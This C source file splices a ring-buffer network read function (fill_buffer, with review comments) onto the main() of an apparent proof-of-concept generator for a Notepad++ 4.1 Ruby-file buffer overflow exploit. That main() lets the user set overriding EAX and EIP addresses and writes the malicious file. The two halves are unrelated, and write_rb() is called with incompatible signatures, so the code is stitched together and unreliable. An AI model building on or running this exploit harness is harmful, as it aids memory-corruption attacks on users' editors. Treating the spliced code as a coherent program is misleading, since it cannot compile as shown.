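/*
 * Read one block of the response body from the network and append it to the
 * handle's ring buffer.
 *
 * The read length is the smaller of the space free_rb() reports for the ring
 * buffer and NEON_NETBLKSIZE. NEON_NETBLKSIZE is also the size of the stack
 * buffer that receives the data, so that cap is what keeps the read inside
 * the local array.
 *
 * Returns:
 *   FILL_BUFFER_EOF     - ne_read_response_block() returned 0
 *   FILL_BUFFER_ERROR   - it returned a negative value; the request is
 *                         destroyed and h->request is set to NULL
 *   FILL_BUFFER_SUCCESS - data was read and handed to write_rb()
 */
static FillBufferResult fill_buffer (struct neon_handle * h)
{
    char buffer[NEON_NETBLKSIZE];

    /*
     * NOTE(review): free_rb() is not visible here. If it can return 0, the
     * zero-length read below would presumably come back as 0 and be reported
     * as end of file; a negative value would not be a valid length at all.
     * Confirm that callers only invoke this when the ring buffer has room.
     */
    int space = free_rb (& h->rb);
    int to_read = MIN (space, NEON_NETBLKSIZE);

    int got = ne_read_response_block (h->request, buffer, to_read);

    if (got == 0)
    {
        /* %p expects a void pointer, so cast as the error path already does. */
        _DEBUG ("<%p> End of file encountered", (void *) h);
        return FILL_BUFFER_EOF;
    }

    if (got < 0)
    {
        _ERROR ("<%p> Error while reading from the network", (void *) h);

        /* Clear the pointer so the destroyed request cannot be reused. */
        ne_request_destroy (h->request);
        h->request = NULL;
        return FILL_BUFFER_ERROR;
    }

    _DEBUG ("<%p> Read %d bytes of %d", (void *) h, got, to_read);

    /*
     * NOTE(review): the result of write_rb() is not checked here; whether it
     * can fail or write short is not visible from this function.
     */
    write_rb (& h->rb, buffer, got);

    return FILL_BUFFER_SUCCESS;
}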
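/*
 * Entry point of the proof-of-concept file generator.
 *
 * Prints the banner, loads the default register values (DFL_EAX / DFL_EIP)
 * into the global `tbl`, parses the command line and then calls write_rb()
 * to emit the output file.
 *
 * Options:
 *   -f <file>  output file name; ".rb" is appended unless the name already
 *              ends in ".rb" (case-insensitive). Only the first -f is used.
 *   -x <hex>   overrides tbl.eax
 *   -e <hex>   overrides tbl.eip
 *
 * NOTE(review): usage() and printe(..., 1) are presumably non-returning.
 * The original already relies on that: it prints tbl.file right after
 * calling usage() for a missing -f, and uses tbl.file right after a failed
 * allocation is reported through printe().
 */
int main(int argc, char **argv)
{
    int opt;
    char *ext;

    printf("[*] notepad++[v4.1]: (win32) ruby file processing buffer over"
           "flow exploit.\n[*] by: vade79/v9 [email protected] (fakehalo/realhalo)"
           "\n\n");

    tbl.eax = DFL_EAX;
    tbl.eip = DFL_EIP;

    /* getopt() signals the end of the options with -1, which need not equal EOF. */
    while ((opt = getopt(argc, argv, "f:x:e:")) != -1) {
        switch (opt) {
        case 'f':
            if (tbl.file)
                break; /* keep the first -f, ignore repeats */

            ext = strrchr(optarg, '.');
            if (ext && !strcasecmp(ext, ".rb")) {
                /* Name already carries the extension: copy it as is. */
                if (!(tbl.file = strdup(optarg)))
                    printe("main(): allocating memory failed", 1);
            } else {
                /* Room for the name, the ".rb" suffix and the terminator. */
                size_t len = strlen(optarg) + sizeof ".rb";

                if (!(tbl.file = malloc(len)))
                    printe("main(): allocating memory failed", 1);
                snprintf(tbl.file, len, "%s.rb", optarg);
            }
            break;
        case 'x':
            /* Reject input that is not hex instead of silently keeping the default. */
            if (sscanf(optarg, "%x", &tbl.eax) != 1)
                usage(argv[0]);
            break;
        case 'e':
            if (sscanf(optarg, "%x", &tbl.eip) != 1)
                usage(argv[0]);
            break;
        default:
            usage(argv[0]);
            break;
        }
    }

    if (!tbl.file)
        usage(argv[0]);

    printf("[*] filename:\t\t\t%s\n", tbl.file);
    printf("[*] EAX address:\t\t0x%.8x\n", tbl.eax);
    printf("[*] EIP address:\t\t0x%.8x\n\n", tbl.eip);

    /* write_rb() reports failure with a non-zero return. */
    if (write_rb(tbl.file, tbl.eax, tbl.eip))
        printe("failed to write to file.", 1);

    exit(0);
}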